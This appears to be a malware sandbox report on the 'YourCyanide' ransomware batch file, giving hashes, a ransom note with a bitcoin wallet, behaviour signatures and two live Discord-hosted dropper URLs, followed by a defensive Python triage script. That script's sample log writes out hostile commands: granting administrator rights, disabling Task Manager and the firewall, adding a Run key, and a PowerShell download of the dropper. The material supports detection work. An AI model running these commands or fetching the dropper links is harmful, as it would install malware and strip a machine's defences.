Resubmissions

22/07/2024, 10:50

240722-mxrjasvajk 10

19/05/2022, 17:19

220519-vv97maaad7 10

19/05/2022, 17:15

220519-vskh7acghq 10

General

  • Target

    YourCyanide.cmd

  • Size

    153KB

  • Sample

    220519-vskh7acghq

  • MD5

    69eb09a987e1bfe31418cd020811b81d

  • SHA1

    d7dd4d7f065f078cf55a7c0c1f4bcd9ec52096d6

  • SHA256

    4b3efbf87fb31216a93954617e149825b9f029b4a37ea0fff9851eb363693424

  • SHA512

    8ff7aafd71231704edd19f5aef32ebf181918d3e02afb909e82271c11ec2d16da3bebc8eeb0246821bcda07f8c499a7c0e4fb438f723b448945d27d3b714815b

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cdn.discordapp.com/attachments/974798125011198003/976894591552860220/NoKeyB.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe

Extracted

Path

C:\Users\Admin\Desktop\YcynNote.txt

Ransom Note
Q: What happened to my files? A: Oops your files have been encrypted by YourCyanide. Q: how can I get them back? A: You can get them back by paying $500 in bitcoin to this btc wallet bc1qrl532s9r2qge8d8p7qlrq57dc4uhssqjexmlwf. Q: What happens if I dont pay? A: You will never get your files back. A: contact at [email protected]. ++++++++++++++++++++++++++++++++++++++++++++ 7510 Files have been encrypted

Targets

    • Target

      YourCyanide.cmd

    • Size

      153KB

    • MD5

      69eb09a987e1bfe31418cd020811b81d

    • SHA1

      d7dd4d7f065f078cf55a7c0c1f4bcd9ec52096d6

    • SHA256

      4b3efbf87fb31216a93954617e149825b9f029b4a37ea0fff9851eb363693424

    • SHA512

      8ff7aafd71231704edd19f5aef32ebf181918d3e02afb909e82271c11ec2d16da3bebc8eeb0246821bcda07f8c499a7c0e4fb438f723b448945d27d3b714815b

    • Grants admin privileges

      Uses net.exe to modify the user's privileges.

    • Blocklisted process makes network request

    • Disables Task Manager via registry modification

    • Downloads MZ/PE file

    • Executes dropped EXE

    • Modifies Windows Firewall

    • Adds Run key to start application

    • Legitimate hosting services abused for malware hosting/C2
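
The signatures above describe behaviours, not detections. The following Python is an added example (not part of the sandbox report or the sample) that turns the page's IOCs into a small triage script: it checks a file's hashes against the three listed digests, pulls the two Discord CDN dropper URLs out of text, and maps each reported signature to a command-line pattern run over process-creation records. The regexes in SIGNATURE_PATTERNS, the "image|commandline" record format, and every line in SAMPLE_LOG are assumptions constructed for illustration; the report itself only names the behaviours and does not show the sample's command lines.

```python
"""Triage helpers built from the signatures and IOCs listed in the report above.

Added example, not part of the sandbox report: the log lines below are
constructed to illustrate the reported behaviours and are not output from
the sample. Only the hashes and URLs are taken from the page.
"""
import hashlib
import re

# File hashes reported for YourCyanide.cmd
IOC_HASHES = {
    "md5": "69eb09a987e1bfe31418cd020811b81d",
    "sha1": "d7dd4d7f065f078cf55a7c0c1f4bcd9ec52096d6",
    "sha256": "4b3efbf87fb31216a93954617e149825b9f029b4a37ea0fff9851eb363693424",
}

# Dropper URLs extracted from the sample's PowerShell stage
IOC_URLS = {
    "https://cdn.discordapp.com/attachments/974798125011198003/976894591552860220/NoKeyB.exe",
    "https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe",
}

# One command-line regex per reported signature. The patterns are
# assumptions about how each behaviour shows up in process-creation
# telemetry (e.g. Sysmon event 1), not rules shipped by the sandbox.
SIGNATURE_PATTERNS = {
    "Grants admin privileges":
        re.compile(r"\bnet1?(\.exe)?\s+localgroup\s+administrators\b.*\s/add\b", re.I),
    "Disables Task Manager via registry modification":
        re.compile(r"\bDisableTaskMgr\b", re.I),
    "Modifies Windows Firewall":
        re.compile(r"\bnetsh(\.exe)?\s+(advfirewall|firewall)\b", re.I),
    "Adds Run key to start application":
        re.compile(r"CurrentVersion\\Run\b", re.I),
    "Legitimate hosting services abused for malware hosting/C2":
        re.compile(r"cdn\.discordapp\.com/attachments/", re.I),
}

URL_RE = re.compile(r"https?://[^\s'\"<>]+")


def hash_matches(data: bytes) -> list:
    """Return the names of the reported hashes that the given file contents match."""
    digests = {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }
    return [name for name, value in digests.items() if IOC_HASHES[name] == value]


def ioc_urls_in(text: str) -> list:
    """Return every URL in text that exactly equals a reported dropper URL."""
    return [u for u in URL_RE.findall(text) if u in IOC_URLS]


def scan_commandline(cmdline: str) -> list:
    """Return the report signatures whose pattern matches one command line."""
    return [name for name, rx in SIGNATURE_PATTERNS.items() if rx.search(cmdline)]


def scan_log(lines) -> dict:
    """Map each signature to the 1-based line numbers that triggered it.

    Each record is "image|commandline"; the image is ignored because the
    command line alone carries the evidence for all five signatures.
    """
    hits = {}
    for lineno, line in enumerate(lines, start=1):
        _, _, cmdline = line.partition("|")
        for name in scan_commandline(cmdline):
            hits.setdefault(name, []).append(lineno)
    return hits


# Constructed process-creation records ("image|commandline"), illustrative only.
SAMPLE_LOG = [
    r"C:\Windows\System32\net.exe|net localgroup administrators Admin /add",
    r'C:\Windows\System32\reg.exe|reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f',
    r"C:\Windows\System32\netsh.exe|netsh advfirewall set allprofiles state off",
    r'C:\Windows\System32\reg.exe|reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v YourCyanide /d "C:\Users\Admin\YourCyanide.cmd" /f',
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -c "
    "\"(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/974798125011198003/976894591552860220/NoKeyB.exe', 'C:\\Users\\Admin\\NoKeyB.exe')\"",
    r"C:\Windows\explorer.exe|explorer.exe",
]

if __name__ == "__main__":
    for name, linenos in scan_log(SAMPLE_LOG).items():
        print(f"{name}: lines {linenos}")
    print("Dropper URLs seen:", ioc_urls_in(" ".join(SAMPLE_LOG)))
    print("Hash matches for a dummy file:", hash_matches(b"not the sample"))
```

Hash matching is exact and only catches this build; the command-line patterns are the reusable part, since a recompiled dropper still has to run net.exe, write DisableTaskMgr, reconfigure the firewall and set a Run key to achieve the same effects. Discord attachment URLs are ordinary HTTPS to a legitimate host, so the URL check is useful for retrospective search but a blocklist on the two exact links will not survive the next upload.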

MITRE ATT&CK Enterprise v6

Tasks